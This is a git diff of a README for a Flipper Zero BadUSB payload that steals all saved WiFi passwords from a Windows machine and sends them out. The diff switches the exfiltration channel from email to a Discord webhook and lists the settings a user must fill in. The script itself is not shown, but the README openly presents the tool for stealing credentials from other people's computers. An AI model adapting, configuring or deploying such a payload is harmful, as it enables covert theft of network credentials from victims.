zirtec12/Flipper_Zero-BadUsb/BadUsb-Collection/Windows_Badusb/PasswordStuff/StealWifiKeys_Email/readme.md

-# StealWifiKeys_Email
+# StealWifiKeys_Discord
-Steals all of the saved Wifi Passwords and stores them into a file, then sends the file via email.
+Steals all of the saved Wifi Passwords and stores them into a file, then sends the file to a discord webhook.

 ## How to use?

-This script is not plug and play and only for experienced users.
+This script is not plug and play.
 You will need to do the following changes:

-- change credentials "System.Net.NetworkCredential('EMAIL HERE', 'EMAIL PASSWORD HERE')"
-- change credentails "$ReportEmail.From = 'YOUR EMAIL'"
-- change credentials "$ReportEmail.To.Add('email to send to')"
+- change discord webhhook url.

 ## Features